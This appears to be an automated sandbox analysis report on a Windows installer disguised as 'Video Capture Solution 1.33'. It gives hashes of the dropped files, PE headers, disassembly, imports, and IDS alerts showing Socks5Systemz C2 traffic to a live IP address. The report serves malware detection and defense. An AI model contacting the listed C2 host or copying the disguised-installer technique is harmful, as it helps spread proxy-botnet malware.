                                                        SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):645592
                                                        Entropy (8bit):6.50414583238337
                                                        Encrypted:false
                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):715253
                                                        Entropy (8bit):6.514725891252045
                                                        Encrypted:false
                                                        SSDEEP:12288:+/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRvh1K8xyF8:+kqZ1G7DMvrP537dzHsA6hcHGbH3Ephx
                                                        MD5:BBA0FB9821CB5144F08CB5E1B6A199D8
                                                        SHA1:2FD483B6CE0714D354C35068C52EF2FC6329A5D8
                                                        SHA-256:507CEC881D67923B2830557FF8E47CD8CEE06295F33D025C60FCBFC717D00318
                                                        SHA-512:AAED6B019AF80DED7262D72C17DF88FE0D99546FF7A894A41DB59AC56D774E69455A7085527273A220B2814D8286937847CA154688756A3A430F36F13645A929
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:InnoSetup Log Video Capture Solution, version 0x30, 5023 bytes, 142233\user, "C:\Users\user\AppData\Local\Video Capture Solution 1.33"
                                                        Category:dropped
                                                        Size (bytes):5023
                                                        Entropy (8bit):4.778251942505703
                                                        Encrypted:false
                                                        SSDEEP:96:2nWa8n8wprQZSsp9A+eOIhFm17ICSss/LnDj4G:2nWa8nbprQZSYHIhqICSsAnN
                                                        MD5:618990E02A2A401B2771EFEB0E3B1CB6
                                                        SHA1:82225DFD08F5F462B50FA969721238AB8402D707
                                                        SHA-256:0F7C69854742CFE558B326597FBD643A227893F246EB8CEA5D6D13607013ACBE
                                                        SHA-512:837E7320CDFF7E2AA44BEAC5666D160FF44E0B8371DC3C897E96535F7F2C457A8ABA0D80DEC4626BAC4E1382C618253FEF0357588D82B37DAAC2D436EB7348AE
                                                        Malicious:false
                                                        Preview:Inno Setup Uninstall Log (b)....................................Video Capture Solution..........................................................................................................Video Capture Solution..........................................................................................................0...........%..................................................................................................................R........O.........X....142233.user8C:\Users\user\AppData\Local\Video Capture Solution 1.33...........4...... .....I......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dl
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):715253
                                                        Entropy (8bit):6.514725891252045
                                                        Encrypted:false
                                                        SSDEEP:12288:+/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRvh1K8xyF8:+kqZ1G7DMvrP537dzHsA6hcHGbH3Ephx
                                                        MD5:BBA0FB9821CB5144F08CB5E1B6A199D8
                                                        SHA1:2FD483B6CE0714D354C35068C52EF2FC6329A5D8
                                                        SHA-256:507CEC881D67923B2830557FF8E47CD8CEE06295F33D025C60FCBFC717D00318
                                                        SHA-512:AAED6B019AF80DED7262D72C17DF88FE0D99546FF7A894A41DB59AC56D774E69455A7085527273A220B2814D8286937847CA154688756A3A430F36F13645A929
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:modified
                                                        Size (bytes):3281038
                                                        Entropy (8bit):6.6109330082563496
                                                        Encrypted:false
                                                        SSDEEP:98304:hHY4bl5znLaEGzUjIX24RJ4IB//bR6SodyUfalD:hH9l5znLaEGK/Sody9lD
                                                        MD5:F980DB1C4941DE93EA4A88045D20F6D5
                                                        SHA1:990341E89AE748B370CCF38CA167FF9A8D548256
                                                        SHA-256:0325826FD16CEC2AB3F6C56C29B800EBC9E4C33C686BA1D17871B7E3C3091479
                                                        SHA-512:50B31F989AF64CA6EEF354CDAB52041FE0EB5EF3D3BB57295AE9130EE7D50C1172DE921381523E9388524050E1DBB1B1BE3F0D81A7321E9E43CA68C124B67C9C
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L..._..L.....................T...................@..........................p2......z2.....................................T...........`...............................................................................|..........................._rste_2............................. ..`_rstf_2.............................@..@_rstg_2..d... ...0..................@....rsrc................6..............@..@_rsth_2...!..p.... .................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.998110037622252
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 98.86%
                                                        • Inno Setup installer (109748/4) 1.08%
                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        File name:AbC0LBkVhr.exe
                                                        File size:3'774'004 bytes
                                                        MD5:038c7d5697bfbe553717357809e621bf
                                                        SHA1:1264a6bc374db430ce8007b99cc6b10ad0f14c9e
                                                        SHA256:71f8685ec48d0623886c9cf10bc1bc806586904c939aa28d20f9a253d45b623f
                                                        SHA512:5efd09421e9d4fbd295f1837416c4c6221dd658b95133ae6c9adfbdec803ae7f0d78404e43352db35f570ea3330850a7a93463452435e3980c59e7f99978e4c9
                                                        SSDEEP:98304:Nq7HAHRAuq+jR377VPm3v9exaG/ak4Rac/8fEUbEOUJS:M7yAuq+jR37thxaG/waU+ZEOj
                                                        TLSH:18063341ECE48172D040D9741E189449503BBE338B7D20A56EBD06EDEFA3A63C56FAED
                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                        Icon Hash:2d2e3797b32b2b99
                                                        Entrypoint:0x409c40
                                                        Entrypoint Section:CODE
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:1
                                                        OS Version Minor:0
                                                        File Version Major:1
                                                        File Version Minor:0
                                                        Subsystem Version Major:1
                                                        Subsystem Version Minor:0
                                                        Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        add esp, FFFFFFC4h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor eax, eax
                                                        mov dword ptr [ebp-10h], eax
                                                        mov dword ptr [ebp-24h], eax
                                                        call 00007FD8DCCDA84Bh
                                                        call 00007FD8DCCDBA52h
                                                        call 00007FD8DCCDBCE1h
                                                        call 00007FD8DCCDDD18h
                                                        call 00007FD8DCCDDD5Fh
                                                        call 00007FD8DCCE068Eh
                                                        call 00007FD8DCCE07F5h
                                                        xor eax, eax
                                                        push ebp
                                                        push 0040A2FCh
                                                        push dword ptr fs:[eax]
                                                        mov dword ptr fs:[eax], esp
                                                        xor edx, edx
                                                        push ebp
                                                        push 0040A2C5h
                                                        push dword ptr fs:[edx]
                                                        mov dword ptr fs:[edx], esp
                                                        mov eax, dword ptr [0040C014h]
                                                        call 00007FD8DCCE125Bh
                                                        call 00007FD8DCCE0E8Eh
                                                        lea edx, dword ptr [ebp-10h]
                                                        xor eax, eax
                                                        call 00007FD8DCCDE348h
                                                        mov edx, dword ptr [ebp-10h]
                                                        mov eax, 0040CE24h
                                                        call 00007FD8DCCDA8F7h
                                                        push 00000002h
                                                        push 00000000h
                                                        push 00000001h
                                                        mov ecx, dword ptr [0040CE24h]
                                                        mov dl, 01h
                                                        mov eax, 0040738Ch
                                                        call 00007FD8DCCDEBD7h
                                                        mov dword ptr [0040CE28h], eax
                                                        xor edx, edx
                                                        push ebp
                                                        push 0040A27Dh
                                                        push dword ptr fs:[edx]
                                                        mov dword ptr fs:[edx], esp
                                                        call 00007FD8DCCE12CBh
                                                        mov dword ptr [0040CE30h], eax
                                                        mov eax, dword ptr [0040CE30h]
                                                        cmp dword ptr [eax+0Ch], 01h
                                                        jne 00007FD8DCCE140Ah
                                                        mov eax, dword ptr [0040CE30h]
                                                        mov edx, 00000028h
                                                        call 00007FD8DCCDEFD8h
                                                        mov edx, dword ptr [00000030h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x9364 | 0x9400 | 2c410dfc3efd04d9b69c35c70921424e | False | 0.6147856841216216 | data | 6.560885192755103 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0xb000 | 0x24c | 0x400 | d5ea23d4ecf110fd2591314cbaa84278 | False | 0.310546875 | data | 2.7390956346874638 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0xc000 | 0xe88 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0x8b4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x11000 | 0x2c00 | 0x2c00 | 0f321b182ec9b63ff2294e55283c47f7 | False | 0.3234197443181818 | data | 4.470502442666072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4b8 | COM executable for DOS | English | United States | 0.2814569536423841
RT_MANIFEST | 0x13534 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll | MessageBoxA
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll | InitCommonControls
advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T14:53:00.972080+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49737 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:00.972080+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49737 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:04.945392+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49737 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:04.945392+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49737 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:06.672139+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49750 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:06.672139+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49750 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:08.409471+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49755 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:08.409471+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49755 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:10.043993+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49757 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:10.043993+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49757 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:10.695596+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49757 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:10.695596+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49757 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:12.337893+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49765 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:12.337893+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49765 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:13.939702+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49768 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:13.939702+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49768 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:15.552173+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49774 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:15.552173+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49774 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:17.135660+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49778 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:17.135660+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49778 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:18.859616+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49781 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:18.859616+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49781 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:19.478454+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49781 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:19.478454+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49781 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:21.246296+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:21.246296+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:21.856324+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:21.856324+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:22.496373+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:22.496373+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:23.106741+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:23.106741+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49789 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:25.816329+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49798 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:25.816329+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49798 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:27.716440+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49803 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:27.716440+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49803 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:28.327002+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49803 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:28.327002+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49803 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:29.959132+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49811 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:29.959132+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49811 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:31.620468+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49815 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:31.620468+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49815 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:33.371099+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49821 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:33.371099+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49821 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:34.117261+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49821 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:34.117261+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49821 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:35.744506+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49827 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:35.744506+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49827 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:37.333697+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49833 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:37.333697+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49833 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:38.973303+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49837 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:38.973303+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49837 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:40.596098+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49840 | 147.45.126.31 | 80 | TCP
